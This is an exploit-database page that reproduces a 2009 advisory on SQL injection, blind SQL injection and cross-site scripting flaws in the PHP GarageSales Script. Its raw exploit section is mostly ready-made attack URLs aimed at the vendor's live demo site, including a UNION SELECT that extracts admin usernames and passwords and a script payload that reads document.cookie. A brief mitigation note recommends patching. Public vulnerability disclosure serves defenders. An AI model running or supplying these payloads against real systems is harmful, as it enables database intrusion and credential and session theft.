header-logo
Suggest Exploit
vendor:
GarageSales Script
by:
Moudi
8,8
CVSS
HIGH
SQL Injection and Blind SQL Injection
89,564
CWE
Product Name: GarageSales Script
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

GarageSales Script Multiple Remote Vulnerabilities

GarageSales Script is vulnerable to multiple remote vulnerabilities, including SQL Injection and Blind SQL Injection. An attacker can exploit these vulnerabilities to gain access to sensitive information, such as usernames and passwords, from the application's database. The vulnerable URL is http://www.garagesalesjunkie.com/tryit/visitor/view.php?key=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- for SQL Injection and http://www.garagesalesjunkie.com/tryit/visitor/view.php?key=null+union+select+1,2,(select+concat(username,0x3a,password)+from+admin_users+limit+0,1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26-- for Blind SQL Injection.

Mitigation:

The vendor has released a patch to address these vulnerabilities. It is recommended to upgrade to the latest version of the application.
Source

Exploit-DB raw data:

###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     / \    | |     | |        / \    | | | |
                    / _ \   | |     | |       / _ \   | |_| |
                   / ___ \  | |___  | |___   / ___ \  |  _  |
   IN THE NAME OF /_/   \_\ |_____| |_____| /_/   \_\ |_| |_|
                                                             

==============================================================================
        [»] [!] Coder - Developer HTML / CSS / PHP / Vb6 . [!]
==============================================================================
        [»] GarageSales Script Multiple Remote Vulnerabilities
==============================================================================

	[»] Script:             [ GarageSales Script ]
	[»] Language:           [ PHP ]
        [»] Download:           [ http://www.garagesalesjunkie.com/  ]
	[»] Founder:            [ Moudi <m0udi@9.cn> ]
        [»] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man , Security-Shell ...]
        [»] Team:               [ EvilWay ]
        [»] Dork:               [ OFF ]
        [»] Price:              [ $40.00 USD ]
        [»] Site :              [ https://security-shell.ws/forum.php ]

###########################################################################

===[ Exploit + LIVE : SQL INJECTION vulnerability ]===

[»] http://www.site.com/patch/view.php?key=[SQL]

[»]http://www.garagesalesjunkie.com/tryit/visitor/view.php?key=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

===[ Exploit + LIVE : BLIND SQL INJECTION vulnerability ]===	
	
[»] http://www.site.com/patch/view.php?key=[BLIND]

[»] http://www.garagesalesjunkie.com/tryit/visitor/view.php?key=1 and     11=null+union+select+1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--

===[ Exploit XSS + LIVE : vulnerability ]===

[»] http://www.site.com/patch/view.php?key=[XSS]

[»] http://www.garagesalesjunkie.com/tryit/visitor/view.php?key="><script>alert(document.cookie);</script>.

Author: Moudi

###########################################################################

# milw0rm.com [2009-07-27]

Navigation

Suggest Exploit

Services By CQR